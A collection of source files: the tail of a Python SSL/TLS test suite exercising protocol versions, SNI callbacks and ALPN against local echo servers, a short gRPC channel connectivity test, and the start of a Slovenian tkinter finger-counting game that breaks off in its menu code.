test_protocol_tlsv1(self): """Connecting to a TLSv1 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1') try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"), "TLS version 1.1 not supported.") def test_protocol_tlsv1_1(self): """Connecting to a TLSv1.1 server with various client options. Testing against older TLS versions.""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1') if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1_1) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1') try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"), "TLS version 1.2 not supported.") def test_protocol_tlsv1_2(self): """Connecting to a TLSv1.2 server with various client options. Testing against older TLS versions.""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2', server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2, client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1_2) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2') try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False) def test_starttls(self): """Switching from clear text to encrypted and back again.""" msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6") server = ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_TLSv1, starttls_server=True, chatty=True, connectionchatty=True) wrapped = False with server: s = socket.socket() s.setblocking(1) s.connect((HOST, server.port)) if support.verbose: sys.stdout.write("\n") for indata in msgs: if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) if wrapped: conn.write(indata) outdata = conn.read() else: s.send(indata) outdata = s.recv(1024) msg = outdata.strip().lower() if indata == b"STARTTLS" and msg.startswith(b"ok"): # STARTTLS ok, switch to secure mode if support.verbose: sys.stdout.write( " client: read %r from server, starting TLS...\n" % msg) conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) wrapped = True elif indata == b"ENDTLS" and msg.startswith(b"ok"): # ENDTLS ok, switch back to clear text if support.verbose: sys.stdout.write( " client: read %r from server, ending TLS...\n" % msg) s = conn.unwrap() wrapped = False else: if support.verbose: sys.stdout.write( " client: read %r from server\n" % msg) if support.verbose: sys.stdout.write(" client: closing connection.\n") if wrapped: conn.write(b"over\n") else: s.send(b"over\n") if wrapped: conn.close() else: s.close() def test_socketserver(self): """Using a SocketServer to create and manage SSL connections.""" server = make_https_server(self, certfile=CERTFILE) # try to connect if support.verbose: sys.stdout.write('\n') with open(CERTFILE, 'rb') as f: d1 = f.read() d2 = '' # now fetch the same data from the HTTPS server url = 'https://localhost:%d/%s' % ( server.port, os.path.split(CERTFILE)[1]) context = ssl.create_default_context(cafile=CERTFILE) f = urllib2.urlopen(url, context=context) try: dlen = f.info().getheader("content-length") if dlen and (int(dlen) > 0): d2 = f.read(int(dlen)) if support.verbose: sys.stdout.write( " client: read %d bytes from remote server '%s'\n" % (len(d2), server)) finally: f.close() self.assertEqual(d1, d2) def test_asyncore_server(self): """Check the example asyncore integration.""" indata = "TEST MESSAGE of mixed case\n" if support.verbose: sys.stdout.write("\n") indata = b"FOO\n" server = AsyncoreEchoServer(CERTFILE) with server: s = ssl.wrap_socket(socket.socket()) s.connect(('127.0.0.1', server.port)) if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) s.write(indata) outdata = s.read() if support.verbose: sys.stdout.write(" client: read %r\n" % outdata) if outdata != indata.lower(): self.fail( "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n" % (outdata[:20], len(outdata), indata[:20].lower(), len(indata))) s.write(b"over\n") if support.verbose: sys.stdout.write(" client: closing connection.\n") s.close() if support.verbose: sys.stdout.write(" client: connection closed.\n") def test_recv_send(self): """Test recv(), send() and friends.""" if support.verbose: sys.stdout.write("\n") server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, cacerts=CERTFILE, chatty=True, connectionchatty=False) with server: s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) # helper methods for standardising recv* method signatures def _recv_into(): b = bytearray(b"\0"*100) count = s.recv_into(b) return b[:count] def _recvfrom_into(): b = bytearray(b"\0"*100) count, addr = s.recvfrom_into(b) return b[:count] # (name, method, whether to expect success, *args) send_methods = [ ('send', s.send, True, []), ('sendto', s.sendto, False, ["some.address"]), ('sendall', s.sendall, True, []), ] recv_methods = [ ('recv', s.recv, True, []), ('recvfrom', s.recvfrom, False, ["some.address"]), ('recv_into', _recv_into, True, []), ('recvfrom_into', _recvfrom_into, False, []), ] data_prefix = u"PREFIX_" for meth_name, send_meth, expect_success, args in send_methods: indata = (data_prefix + meth_name).encode('ascii') try: send_meth(indata, *args) outdata = s.read() if outdata != indata.lower(): self.fail( "While sending with <<{name:s}>> bad data " "<<{outdata:r}>> ({nout:d}) received; " "expected <<{indata:r}>> ({nin:d})\n".format( name=meth_name, outdata=outdata[:20], nout=len(outdata), indata=indata[:20], nin=len(indata) ) ) except ValueError as e: if expect_success: self.fail( "Failed to send with method <<{name:s}>>; " "expected to succeed.\n".format(name=meth_name) ) if not str(e).startswith(meth_name): self.fail( "Method <<{name:s}>> failed with unexpected " "exception message: {exp:s}\n".format( name=meth_name, exp=e ) ) for meth_name, recv_meth, expect_success, args in recv_methods: indata = (data_prefix + meth_name).encode('ascii') try: s.send(indata) outdata = recv_meth(*args) if outdata != indata.lower(): self.fail( "While receiving with <<{name:s}>> bad data " "<<{outdata:r}>> ({nout:d}) received; " "expected <<{indata:r}>> ({nin:d})\n".format( name=meth_name, outdata=outdata[:20], nout=len(outdata), indata=indata[:20], nin=len(indata) ) ) except ValueError as e: if expect_success: self.fail( "Failed to receive with method <<{name:s}>>; " "expected to succeed.\n".format(name=meth_name) ) if not str(e).startswith(meth_name): self.fail( "Method <<{name:s}>> failed with unexpected " "exception message: {exp:s}\n".format( name=meth_name, exp=e ) ) # consume data s.read() s.write(b"over\n") s.close() def test_handshake_timeout(self): # Issue #5103: SSL handshake must respect the socket timeout server = socket.socket(socket.AF_INET) host = "127.0.0.1" port = support.bind_port(server) started = threading.Event() finish = False def serve(): server.listen(5) started.set() conns = [] while not finish: r, w, e = select.select([server], [], [], 0.1) if server in r: # Let the socket hang around rather than having # it closed by garbage collection. conns.append(server.accept()[0]) for sock in conns: sock.close() t = threading.Thread(target=serve) t.start() started.wait() try: try: c = socket.socket(socket.AF_INET) c.settimeout(0.2) c.connect((host, port)) # Will attempt handshake and time out self.assertRaisesRegexp(ssl.SSLError, "timed out", ssl.wrap_socket, c) finally: c.close() try: c = socket.socket(socket.AF_INET) c = ssl.wrap_socket(c) c.settimeout(0.2) # Will attempt handshake and time out self.assertRaisesRegexp(ssl.SSLError, "timed out", c.connect, (host, port)) finally: c.close() finally: finish = True t.join() server.close() def test_server_accept(self): # Issue #16357: accept() on a SSLSocket created through # SSLContext.wrap_socket(). context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(CERTFILE) context.load_cert_chain(CERTFILE) server = socket.socket(socket.AF_INET) host = "127.0.0.1" port = support.bind_port(server) server = context.wrap_socket(server, server_side=True) evt = threading.Event() remote = [None] peer = [None] def serve(): server.listen(5) # Block on the accept and wait on the connection to close. evt.set() remote[0], peer[0] = server.accept() remote[0].recv(1) t = threading.Thread(target=serve) t.start() # Client wait until server setup and perform a connect. evt.wait() client = context.wrap_socket(socket.socket()) client.connect((host, port)) client_addr = client.getsockname() client.close() t.join() remote[0].close() server.close() # Sanity checks. self.assertIsInstance(remote[0], ssl.SSLSocket) self.assertEqual(peer[0], client_addr) def test_getpeercert_enotconn(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with closing(context.wrap_socket(socket.socket())) as sock: with self.assertRaises(socket.error) as cm: sock.getpeercert() self.assertEqual(cm.exception.errno, errno.ENOTCONN) def test_do_handshake_enotconn(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with closing(context.wrap_socket(socket.socket())) as sock: with self.assertRaises(socket.error) as cm: sock.do_handshake() self.assertEqual(cm.exception.errno, errno.ENOTCONN) def test_default_ciphers(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) try: # Force a set of weak ciphers on our client context context.set_ciphers("DES") except ssl.SSLError: self.skipTest("no DES cipher available") with ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_SSLv23, chatty=False) as server: with closing(context.wrap_socket(socket.socket())) as s: with self.assertRaises(ssl.SSLError): s.connect((HOST, server.port)) self.assertIn("no shared cipher", str(server.conn_errors[0])) def test_version_basic(self): """ Basic tests for SSLSocket.version(). More tests are done in the test_protocol_*() methods. """ context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_TLSv1, chatty=False) as server: with closing(context.wrap_socket(socket.socket())) as s: self.assertIs(s.version(), None) s.connect((HOST, server.port)) self.assertEqual(s.version(), "TLSv1") self.assertIs(s.version(), None) @unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL") def test_default_ecdh_curve(self): # Issue #21015: elliptic curve-based Diffie Hellman key exchange # should be enabled by default on SSL contexts. context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.load_cert_chain(CERTFILE) # Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled # explicitly using the 'ECCdraft' cipher alias. Otherwise, # our default cipher list should prefer ECDH-based ciphers # automatically. if ssl.OPENSSL_VERSION_INFO < (1, 0, 0): context.set_ciphers("ECCdraft:ECDH") with ThreadedEchoServer(context=context) as server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) self.assertIn("ECDH", s.cipher()[0]) @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES, "'tls-unique' channel binding not available") def test_tls_unique_channel_binding(self): """Test tls-unique channel binding.""" if support.verbose: sys.stdout.write("\n") server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, cacerts=CERTFILE, chatty=True, connectionchatty=False) with server: s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) # get the data cb_data = s.get_channel_binding("tls-unique") if support.verbose: sys.stdout.write(" got channel binding data: {0!r}\n" .format(cb_data)) # check if it is sane self.assertIsNotNone(cb_data) self.assertEqual(len(cb_data), 12) # True for TLSv1 # and compare with the peers version s.write(b"CB tls-unique\n") peer_data_repr = s.read().strip() self.assertEqual(peer_data_repr, repr(cb_data).encode("us-ascii")) s.close() # now, again s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) new_cb_data = s.get_channel_binding("tls-unique") if support.verbose: sys.stdout.write(" got another channel binding data: {0!r}\n" .format(new_cb_data)) # is it really unique self.assertNotEqual(cb_data, new_cb_data) self.assertIsNotNone(cb_data) self.assertEqual(len(cb_data), 12) # True for TLSv1 s.write(b"CB tls-unique\n") peer_data_repr = s.read().strip() self.assertEqual(peer_data_repr, repr(new_cb_data).encode("us-ascii")) s.close() def test_compression(self): context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) if support.verbose: sys.stdout.write(" got compression: {!r}\n".format(stats['compression'])) self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' }) @unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'), "ssl.OP_NO_COMPRESSION needed for this test") def test_compression_disabled(self): context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) context.options |= ssl.OP_NO_COMPRESSION stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['compression'], None) def test_dh_params(self): # Check we can get a connection with ephemeral Diffie-Hellman context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) context.load_dh_params(DHFILE) context.set_ciphers("kEDH") stats = server_params_test(context, context, chatty=True, connectionchatty=True) cipher = stats["cipher"][0] parts = cipher.split("-") if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts: self.fail("Non-DH cipher: " + cipher[0]) def test_selected_alpn_protocol(self): # selected_alpn_protocol() is None unless ALPN is used. context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['client_alpn_protocol'], None) @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required") def test_selected_alpn_protocol_if_server_uses_alpn(self): # selected_alpn_protocol() is None unless ALPN is used by the client. client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_verify_locations(CERTFILE) server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_alpn_protocols(['foo', 'bar']) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) self.assertIs(stats['client_alpn_protocol'], None) @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test") def test_alpn_protocols(self): server_protocols = ['foo', 'bar', 'milkshake'] protocol_tests = [ (['foo', 'bar'], 'foo'), (['bar', 'foo'], 'foo'), (['milkshake'], 'milkshake'), (['http/3.0', 'http/4.0'], None) ] for client_protocols, expected in protocol_tests: server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_alpn_protocols(server_protocols) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_cert_chain(CERTFILE) client_context.set_alpn_protocols(client_protocols) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) msg = "failed trying %s (s) and %s (c).\n" \ "was expecting %s, but got %%s from the %%s" \ % (str(server_protocols), str(client_protocols), str(expected)) client_result = stats['client_alpn_protocol'] self.assertEqual(client_result, expected, msg % (client_result, "client")) server_result = stats['server_alpn_protocols'][-1] \ if len(stats['server_alpn_protocols']) else 'nothing' self.assertEqual(server_result, expected, msg % (server_result, "server")) def test_selected_npn_protocol(self): # selected_npn_protocol() is None unless NPN is used context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['client_npn_protocol'], None) @unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test") def test_npn_protocols(self): server_protocols = ['http/1.1', 'spdy/2'] protocol_tests = [ (['http/1.1', 'spdy/2'], 'http/1.1'), (['spdy/2', 'http/1.1'], 'http/1.1'), (['spdy/2', 'test'], 'spdy/2'), (['abc', 'def'], 'abc') ] for client_protocols, expected in protocol_tests: server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_npn_protocols(server_protocols) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_cert_chain(CERTFILE) client_context.set_npn_protocols(client_protocols) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) msg = "failed trying %s (s) and %s (c).\n" \ "was expecting %s, but got %%s from the %%s" \ % (str(server_protocols), str(client_protocols), str(expected)) client_result = stats['client_npn_protocol'] self.assertEqual(client_result, expected, msg % (client_result, "client")) server_result = stats['server_npn_protocols'][-1] \ if len(stats['server_npn_protocols']) else 'nothing' self.assertEqual(server_result, expected, msg % (server_result, "server")) def sni_contexts(self): server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) other_context.load_cert_chain(SIGNED_CERTFILE2) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.verify_mode = ssl.CERT_REQUIRED client_context.load_verify_locations(SIGNING_CA) return server_context, other_context, client_context def check_common_name(self, stats, name): cert = stats['peercert'] self.assertIn((('commonName', name),), cert['subject']) @needs_sni def test_sni_callback(self): calls = [] server_context, other_context, client_context = self.sni_contexts() def servername_cb(ssl_sock, server_name, initial_context): calls.append((server_name, initial_context)) if server_name is not None: ssl_sock.context = other_context server_context.set_servername_callback(servername_cb) stats = server_params_test(client_context, server_context, chatty=True, sni_name='supermessage') # The hostname was fetched properly, and the certificate was # changed for the connection. self.assertEqual(calls, [("supermessage", server_context)]) # CERTFILE4 was selected self.check_common_name(stats, 'fakehostname') calls = [] # The callback is called with server_name=None stats = server_params_test(client_context, server_context, chatty=True, sni_name=None) self.assertEqual(calls, [(None, server_context)]) self.check_common_name(stats, 'localhost') # Check disabling the callback calls = [] server_context.set_servername_callback(None) stats = server_params_test(client_context, server_context, chatty=True, sni_name='notfunny') # Certificate didn't change self.check_common_name(stats, 'localhost') self.assertEqual(calls, []) @needs_sni def test_sni_callback_alert(self): # Returning a TLS alert is reflected to the connecting client server_context, other_context, client_context = self.sni_contexts() def cb_returning_alert(ssl_sock, server_name, initial_context): return ssl.ALERT_DESCRIPTION_ACCESS_DENIED server_context.set_servername_callback(cb_returning_alert) with self.assertRaises(ssl.SSLError) as cm: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED') @needs_sni def test_sni_callback_raising(self): # Raising fails the connection with a TLS handshake failure alert. server_context, other_context, client_context = self.sni_contexts() def cb_raising(ssl_sock, server_name, initial_context): 1.0/0.0 server_context.set_servername_callback(cb_raising) with self.assertRaises(ssl.SSLError) as cm, \ support.captured_stderr() as stderr: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE') self.assertIn("ZeroDivisionError", stderr.getvalue()) @needs_sni def test_sni_callback_wrong_return_type(self): # Returning the wrong return type terminates the TLS connection # with an internal error alert. server_context, other_context, client_context = self.sni_contexts() def cb_wrong_return_type(ssl_sock, server_name, initial_context): return "foo" server_context.set_servername_callback(cb_wrong_return_type) with self.assertRaises(ssl.SSLError) as cm, \ support.captured_stderr() as stderr: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR') self.assertIn("TypeError", stderr.getvalue()) def test_read_write_after_close_raises_valuerror(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(CERTFILE) context.load_cert_chain(CERTFILE) server = ThreadedEchoServer(context=context, chatty=False) with server: s = context.wrap_socket(socket.socket()) s.connect((HOST, server.port)) s.close() self.assertRaises(ValueError, s.read, 1024) self.assertRaises(ValueError, s.write, b'hello') def test_main(verbose=False): if support.verbose: plats = { 'Linux': platform.linux_distribution, 'Mac': platform.mac_ver, 'Windows': platform.win32_ver, } for name, func in plats.items(): plat = func() if plat and plat[0]: plat = '%s %r' % (name, plat) break else: plat = repr(platform.platform()) print("test_ssl: testing with %r %r" % (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO)) print(" under %s" % plat) print(" HAS_SNI = %r" % ssl.HAS_SNI) print(" OP_ALL = 0x%8x" % ssl.OP_ALL) try: print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1) except AttributeError: pass for filename in [ CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE, ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY, SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA, BADCERT, BADKEY, EMPTYCERT]: if not os.path.exists(filename): raise support.TestFailed("Can't read certificate file %r" % filename) tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests] if support.is_resource_enabled('network'): tests.append(NetworkedTests) if _have_threads: thread_info = support.threading_setup() if thread_info: tests.append(ThreadedTests) try: support.run_unittest(*tests) finally: if _have_threads: support.threading_cleanup(*thread_info) if __name__ == "__main__": test_main()
_channel_test.py
# Copyright 2016 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import threading import unittest from grpc._cython import cygrpc from tests.unit.framework.common import test_constants def _channel_and_completion_queue(): channel = cygrpc.Channel(b'localhost:54321', cygrpc.ChannelArgs(())) completion_queue = cygrpc.CompletionQueue() return channel, completion_queue def _connectivity_loop(channel, completion_queue): for _ in range(100): connectivity = channel.check_connectivity_state(True) channel.watch_connectivity_state(connectivity, cygrpc.Timespec(time.time() + 0.2), completion_queue, None) completion_queue.poll(deadline=cygrpc.Timespec(float('+inf'))) def _create_loop_destroy(): channel, completion_queue = _channel_and_completion_queue() _connectivity_loop(channel, completion_queue) completion_queue.shutdown() def _in_parallel(behavior, arguments): threads = tuple( threading.Thread(target=behavior, args=arguments) for _ in range(test_constants.THREAD_CONCURRENCY)) for thread in threads: thread.start() for thread in threads: thread.join() class ChannelTest(unittest.TestCase): def test_single_channel_lonely_connectivity(self): channel, completion_queue = _channel_and_completion_queue() _in_parallel(_connectivity_loop, (channel, completion_queue,)) completion_queue.shutdown() def test_multiple_channels_lonely_connectivity(self): _in_parallel(_create_loop_destroy, ()) if __name__ == '__main__': unittest.main(verbosity=2)
igra_nedelujoca.py
import tkinter as tk import threading import time ################################################################################## ## Igra # # V igra.py je implementirano vse, kar je potrebno za igro in uporabniški vmesnik. # ################################################################################## # Definiramo konstante, s katerimi bomo dostopali do podatkov o prvem in drugem # igralcu, ki bodo shranjene v arrayu, zato torej 0 in 1. IGRALEC_1 = 0 IGRALEC_2 = 1 # Definiramo konstante, ki določajo globino posameznega algoritma. MINIMAX_GLOBINA = 3 MINIMAXPP_GLOBINA = 5 ALPHABETA_GLOBINA = 7 def nasprotnik(igralec): """Funkcija, ki vrne nasprotnika od igralca, ki je trenutno na potezi.""" return (1 - igralec) class Igra(): """Razred, ki skrbi za vsa pravila igre Prstki.""" def __init__(self, prsti, roke, master=None): # Število rok in maksimalno število prstov na eni roki. self.roke = roke self.prsti = prsti # self.position je tabela, ki hrani trenutno pozicijo. # Inicializiramo jo s seznami enic, kjer seznam predstavlja # posameznega igralca. self.position = [[1 for _ in range(self.roke)], [1 for _ in range(self.roke)]] # Igro seveda začne prvi igralec. self.na_potezi = IGRALEC_1 # Zgodovina nam bo služila za UNDO. self.history = [] # Štetje pozicij je koristno za pravilo o remiju. self.position_count = {} def kopija(self): """ Vrne kopijo igre za razred Racunalnik.""" kopija_igra = Igra(self.prsti, self.roke) kopija_igra.position = [self.position[i][:] for i in range(2)] kopija_igra.na_potezi = self.na_potezi return kopija_igra def shrani_pozicijo(self): """Metoda shrani potezo v zgodovino.""" # Kot je prof. Bauer odlično pripomnil, je treba seznam prepisati. pozicija = [self.position[i][:] for i in range(2)] self.history.append((pozicija, self.na_potezi)) # Pozicijo dodamo še v slovar za preverjanje remija. try: self.position_count[((tuple(pozicija[IGRALEC_1]), tuple(pozicija[IGRALEC_2])), self.na_potezi)] += 1 except KeyError: self.position_count[((tuple(pozicija[IGRALEC_1]), tuple(pozicija[IGRALEC_2])), self.na_potezi)] = 1 def razveljavi_potezo(self): """Metoda, ki razveljavi zadnjo potezo.""" assert self.history != [], "Igra.razveljavi_potezo: self.history is empty." (self.position, self.na_potezi) = self.history.pop() self.position_count[((tuple(self.position[IGRALEC_1]), tuple(self.position[IGRALEC_2])), self.na_potezi)] -= 1 def je_veljavna_poteza(self, roka_napadalca, roka_nasprotnika): """Preveri, ali morda igralec ne napada s prazno roko in ali morda ne napada prazne roke.""" return self.position[self.na_potezi][roka_napadalca] != 0 and self.position[nasprotnik(self.na_potezi)][roka_nasprotnika] != 0 def je_veljavna_delitev(self): """Preveri, ali je možna delitev.""" preostale_roke = 0 self.moznost_delitve = False for roka in self.position[self.na_potezi]: if roka != 0: preostale_roke += 1 stevilo_prstov = roka # Preverimo, ali nam je preostala le ena roka in če je na # preostali roki prstov za večkratnik rok. if preostale_roke == 1 and stevilo_prstov % self.roke == 0: self.moznost_delitve = True self.prsti_po_delitvi = stevilo_prstov // self.roke def veljavne_poteze(self): """Poiščemo VSE veljavne poteze, kar bo v pomoč razredu Racunalnik(), pa tudi nam. Poteza je trojica elementov, kjer prvi vhod pove, ali mora biti opravljena delitev, drugi zaporedno številko roke, s katero je igralec napadel, tretji pa številko napadene roke.""" poteze_arr = [] # Dodamo poteze brez delitve. for roka_napadalca in range(self.roke): for roka_napadenega in range(self.roke): if self.je_veljavna_poteza(roka_napadalca, roka_napadenega): poteze_arr.append((False, roka_napadalca, roka_napadenega)) # Če je možna delitev, dodamo še vse poteze z delitvijo. Preverimo # le, da napadena roka ni enaka 0 (roka napadalca ne more biti 0). self.je_veljavna_delitev() if self.moznost_delitve: for roka_napadalca in range(self.roke): for roka_napadenega in range(self.roke): if self.position[nasprotnik(self.na_potezi)][roka_napadenega] != 0: poteze_arr.append((True, roka_napadalca, roka_napadenega)) return poteze_arr def opravi_delitev(self): """Metoda opravi delitev.""" # Ugotovimo, ali lahko delitev opravimo. self.je_veljavna_delitev() if self.moznost_delitve: # Shranimo pozicijo, če bi si slučajno premislili o delitvi. self.shrani_pozicijo() # Opravimo delitev. self.position[self.na_potezi] = [self.prsti_po_delitvi for _ in range(self.roke)] def opravi_potezo(self, roka_napadalca, roka_napadenega): """Metoda shrani trenutno pozicijo in opravi potezo.""" if self.je_veljavna_poteza(roka_napadalca, roka_napadenega): self.shrani_pozicijo() self.position[nasprotnik(self.na_potezi)][roka_napadenega] = (self.position[nasprotnik(self.na_potezi)][roka_napadenega] + self.position[self.na_potezi][roka_napadalca]) % self.prsti self.na_potezi = nasprotnik(self.na_potezi) def je_remi(self): """Preveri, ali smo se morda znašli v isti poziciji. Preverimo, ali je bila pozicija že zabeležena.""" try: return self.position_count[((tuple(self.position[IGRALEC_1]), tuple(self.position[IGRALEC_2])), self.na_potezi)] == 1 except KeyError: return False def je_konec(self): """Preveri, ali je morda konec igre, torej, če ima igralec na potezi prazne roke.""" return self.position[self.na_potezi] == [0 for _ in range(self.roke)] ################################################################################################## # # Razred Gui # # Skrbi za vse v zvezi z uporabniškim vmesnikom. To je klasični Gui. # ################################################################################################## class Gui(): def __init__(self, master): self.master = master # Naredimo menu. menu = tk.Menu(self.master) self.master.config(menu=menu) # Naredimo child menu Igra. menu_igra = tk.Menu(menu) menu.add_cascade(label="Igra", menu=menu_igra) menu_igra.add_command(label="Nova igra", command=self.izbira_igre) menu_igra.add_command(label="Pravila igre", command=self.pravila) menu_igra.add_separator() menu_igra.add_command(label="Izhod", command=self.master.destroy) # Naredimo child menu Možnosti. menu_options = 